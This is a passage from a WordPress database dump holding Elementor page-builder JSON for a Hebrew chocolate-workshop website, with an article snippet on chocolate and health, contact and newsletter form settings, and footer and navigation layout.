\\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d4\\u05e9\\u05e4\\u05e2\\u05d4 \\u05d7\\u05d9\\u05d5\\u05d1\\u05d9\\u05ea \\u05e2\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d4 \\u05d5\\u05e2\\u05dc \\u05d4\\u05ea\\u05e4\\u05ea\\u05d7\\u05d5\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05e8 \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d1\\u05de\\u05d9\\u05e9\\u05e8\\u05d9\\u05df, \\u05d0\\u05dc\\u05d0 \\u05d0\\u05e3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d9\\u05e9\\u05d9\\u05e8\\u05d4 \\u05e2\\u05e7\\u05d1 \\u05ea\\u05db\\u05d5\\u05dc\\u05ea \\u05d4\\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd.<\\/p><p>\\u05d4\\u05dd \\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05db\\u05d9 \\u05d4\\u05e6\\u05e2\\u05d3 \\u05d4\\u05d1\\u05d0 \\u05e9\\u05dc \\u05d4\\u05e6\\u05d5\\u05d5\\u05ea \\u05d4\\u05d5\\u05d0 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e0\\u05d9\\u05e1\\u05d5\\u05d9 \\u05d1\\u05d9\\u05e7\\u05d5\\u05e8\\u05ea \\u05d0\\u05e7\\u05e8\\u05d0\\u05d9 \\u05d2\\u05d3\\u05d5\\u05dc \\u05db\\u05d3\\u05d9 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d0\\u05dd \\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e7\\u05e8\\u05d1 \\u05e0\\u05e9\\u05d9\\u05dd \\u05d4\\u05e8\\u05d5\\u05ea \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05e4\\u05d7\\u05d9\\u05ea \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df \\u05d5\\u05d4\\u05e4\\u05e8\\u05e2\\u05d5\\u05ea \\u05d9\\u05ea\\u05e8 \\u05dc\\u05d7\\u05e5 \\u05d3\\u05dd \\u05d4\\u05e7\\u05e9\\u05d5\\u05e8\\u05d9\\u05dd \\u05dc\\u05d4\\u05e8\\u05d9\\u05d5\\u05df.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(771,162,'_elementor_version','0.4'),(772,162,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(775,163,'_elementor_template_type','single'),(776,163,'_elementor_edit_mode','builder'),(777,163,'_wp_page_template','default'),(778,163,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(779,163,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7c736ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"081917e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8afb22\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from 